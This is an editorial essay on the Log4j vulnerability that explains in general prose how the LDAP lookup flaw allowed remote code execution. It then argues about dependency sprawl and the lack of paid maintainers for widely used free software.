Lessons from Log4j
What went wrong
There are a lot of articles describing the mechanics of this bug and how to exploit it in great detail; see this page for an extensive collection. In short: Log4j™ is a Java logging package trademarked and distributed by the Apache Software Foundation. It has found its way into many other projects and can be found all over the Internet. Indeed, according to this article, Log4j has been downloaded over 28 million times — in the last four months — and is a dependency for nearly 7,000 other projects. So a vulnerability in Log4j is likely to become a vulnerability in many other systems that happen to use it.
As the Apache Software Foundation proudly tweeted in June, it's even on the Ingenuity helicopter on Mars.
Normally, one thinks that a logging utility should accept data of interest and reliably log it. Log4j seemingly does this, but it also does something that, arguably, no logging system should do: it actively interprets the data to be logged and acts upon it. One thing it can do is query remote servers for data and include that in the log message. For example, it can obtain and incorporate data from an LDAP server, a feature that might be useful when one wishes to add data to the log that includes information about a user's account.
It turns out, though, that the remote directory server can supply other things, including serialized Java objects that will be reconstituted and executed. That turns this feature into a way to inject code into the running application that, presumably, only wanted to log some data. To exploit this opening, an attacker needs to do two things:
- Put up a server running a suitable protocol in a place where the target system can reach it. LDAP seems to be the protocol of choice at the moment, but others are possible; a grep of LWN's logs shows attempts to use DNS as well.
- Convince the target system to log an attacker-supplied string containing the incantation that will load and execute the object from the malicious server.
The second step above is often easier than it might seem; many systems will happily log user-supplied data. The hostile string may take the form of a user name that ends up in the log; the browser's user-agent string also seems to be a popular choice. Once the target takes the bait and logs the malicious string, the game is over.
This is, in other words, a case of interpreting unsanitized data supplied by the Internet, with predictable consequences; it is a failure that should have been caught in any reasonable review process. Note that the malicious strings can also be passed by front-end software to internal systems, which might then decide to log it. In other words, not being directly exposed to the Internet is not necessarily a sufficient defense for vulnerable systems. Every system using Log4j needs to be fixed, either by upgrading or by applying one of the other mitigations found in the above-linked article. Note that the initial fixes have proved to be insufficient to address all of the problems in Log4j; users will need to stay on top of the ongoing stream of updates.
The reaction to this vulnerability has been swift and strong. Some commenters are asserting that "open source is broken". Anybody who hadn't seen xkcd #2347 before has probably encountered it by now. Has our community failed as badly as some would have it? In short, there would appear to be two broad shortcomings highlighted by this episode, relating to dependencies and maintainers.
Dependencies galore
In the early days of free software, there simply was not much free code out there, so almost everything had to be written from scratch. At that time, thus, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.
For as long as your editor has been in this field — rather longer than he cares to admit — developers and academics both have talked about the benefits of reusable software. Over the years, that dream has certainly been accomplished. Many language communities have accumulated a massive collection of modules for many common (and uncommon) tasks; writing a program often just becomes an exercise in finding the right modules and gluing them together correctly. Interfaces to repositories automate the process of fetching the necessary modules (and the modules they depend on). For those of us who, long ago, became used to the seemingly infinite loop of running configure then tracking down the next missing dependency, modern environments seem almost unfair. The challenge is gone.
This is a huge success for our community; we have created development environments that can be a joy to work within, and which allow us to work at a level of productivity that couldn't really be imagined some decades ago. There is a problem lurking here, though: this structure makes it easy for a project to accumulate dependencies on outside modules, each of which may bring some risks of its own. When you are, essentially, importing random code off the Internet into your own program, any of a number of things can happen. One of those modules could be overtly hostile (as happened with event-stream), it could simply vanish (left-pad), or it could just suffer from neglect, as appears to have happened with Log4j.
When the quality of the things one consumes is of concern, one tends to fall back to known brands. Log4j is developed under the Apache Software Foundation brand which, one might hope, would be an indicator of quality and active maintenance. Appearances can be deceiving, though; one need not look further than Apache OpenOffice, which continues to be downloaded and used despite having been almost entirely starved of development effort for years, for an example. OpenOffice users will be relieved to know, though, that (according to the project's October 2021 report) OpenOffice has finally managed to put together a new draft mission statement. Log4j is a bit more active than that, but it still depends on the free-time effort of unpaid maintainers. Apache brand or not, this project, which is widely depended on, has nobody paid to maintain it.
But, even if the brand signals were more reliable, the problem remains that it is hard to stay on top of hundreds of dependencies. A library that appeared solid and well maintained when it was adopted can look rather less appealing a year or two later, but projects lacking good maintenance often tend not to attract attention until something goes badly wrong. Users of such a project may not understand the increasing level of risk until it is too late. Our tooling makes adding dependencies easy (to the point that we may not even be aware of them); it is less helpful when it comes to assessing the maintenance state of our existing dependencies.
Maintainers
A related problem is lack of development and maintenance support for projects that are heavily depended on. The old comparison between free software and a free puppy remains on point; puppies are wonderful, but if somebody isn't paying attention they will surely pee on the carpet and chew up your shoes. It is easy to take advantage of the free-of-charge nature of free software to incorporate a wealth of capable code, but every one of those dependencies is a puppy that needs to be under somebody's watchful eye.
As a community, we are far better at acquiring puppies than we are at training them. Companies will happily take the software that is offered, without feeling the need to contribute back even to the most crucial components in their system. Actually, we all do that; there is no way for anybody to support every project that they depend on. We all get far more out of free software than we can possibly put back into it, and that is, of course, a good thing.
That said, there is also a case to be made that the corporate side of our ecosystem is too quick to take the bounty of free software for granted. If a company is building an important product or service on a piece of free software, it behooves that company to ensure that said software is well supported and, if need be, step up to make that happen. It is the right thing to do in general, but it is far from an altruistic act; the alternative is a continual stream of Log4j-like crises. Those, as many companies are currently discovering, are expensive.
"Stepping up" means supporting maintainers as well as developers; it is with maintainers that the problem is often most acute. Even a project like the Linux kernel, which has thousands of developers who are paid for their work, struggles to find support for maintainers. Companies, it seems, see maintainership work as overhead at best, helping competitors at worst, and somebody else's problem in any case. Few companies reward their employees for acting as maintainers, so many of them end up doing that work on their own time. The result is projects with millions of downloads whose maintenance is done in somebody's free time — if it is done at all.
These problems are not specific to free software; discovering that a piece
of proprietary software is not as well supported as was claimed is far from
unheard of. Free software, at least, can be fixed even in the absence of
cooperation from its creators. But the sheer wealth of software created by
our community makes some of these problems worse; there is a massive amount
of code to maintain, and little incentive for many of its users to help
make that happen. We will presumably get a handle on these issues at some
point, but it's not entirely clear how; until that happens, we'll continue
deploying minimally supported software to Mars (and beyond).
